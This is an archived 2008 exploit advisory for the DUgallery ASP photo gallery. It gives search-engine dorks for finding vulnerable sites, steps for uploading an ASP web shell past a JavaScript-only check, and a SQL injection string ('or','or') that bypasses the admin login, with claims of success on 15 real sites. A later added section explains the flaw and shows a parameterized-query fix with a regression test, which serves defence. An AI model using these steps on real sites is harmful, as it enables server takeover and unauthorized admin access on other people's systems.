Source: securityvulns, SECURITYVULNS:DOC:20538
Sep 20, 2008 - 12:00 a.m.

DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities


###################################################################

DUgallery - ALL VERSIONS!

Discovered by: Alemin_Krali

my blog: al3m.blogspot.com

inurl:pic.asp?iCat=

inurl:cat.asp?iCat=

#-# 1-Upload Bug [HIGH!!! %75 success] new!

1-Open Firefox
2-Tools > Options > Content > JavaScript not active, and save. Reopen Firefox.

http://[site.com]/path/add.asp ==>>> upload your Asp shell

http://[site.com]/path/pictures/yourshell.asp ==>>> your address

#-# 2-SQL INJECTION ? [HIGH!!! %95 success]

Tried 15 sites and the result was 15/15 :)

site.com/path/admin_default.asp

'a

Syntax error (missing operator) in query expression 'U_ID=''a' AND U_PASSWORD='''.

USERNAME:'or','or'
PASSWORD:

and submit! welcome to admin panel (:

###################################################################
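
Added example, not part of the original advisory and not DUgallery's code: the error message above shows the login query being built by pasting form fields into the SQL text, and this sketch puts that pattern beside a parameterized version with a quote check that can be run as a regression test. It uses SQLite as a stand-in for the application's database; the table name USERS, the sample account and the function names are assumptions, while the column names U_ID and U_PASSWORD are taken from the error message.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the application's user table (SQLite, not Access).
    # Table name USERS and the sample account are assumptions; the column
    # names U_ID and U_PASSWORD come from the error message in the advisory.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE USERS (U_ID TEXT, U_PASSWORD TEXT)")
    db.execute("INSERT INTO USERS VALUES ('admin', 'constructed-password')")
    return db

def login_concatenated(db, user, password):
    # 'Before': form fields are pasted into the SQL text, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM USERS WHERE U_ID='" + user +
           "' AND U_PASSWORD='" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, user, password):
    # 'After': the SQL text is fixed and the values are bound as parameters,
    # so quotes in the input are compared as ordinary characters.
    sql = "SELECT COUNT(*) FROM USERS WHERE U_ID=? AND U_PASSWORD=?"
    return db.execute(sql, (user, password)).fetchone()[0] > 0

def quote_probe(login, db):
    # Regression check: a lone quote in the user field must be treated as data.
    try:
        return "accepted" if login(db, "'a", "") else "rejected"
    except sqlite3.Error as exc:
        return "sql-error: " + str(exc)

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", quote_probe(login_concatenated, db))
    print("parameterized:", quote_probe(login_parameterized, db))
    print("advisory input rejected:", not login_parameterized(db, "'or','or'", ""))
```

A "sql-error" result from the quote check on any login path means user input is reaching the SQL parser and that path still needs bound parameters.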

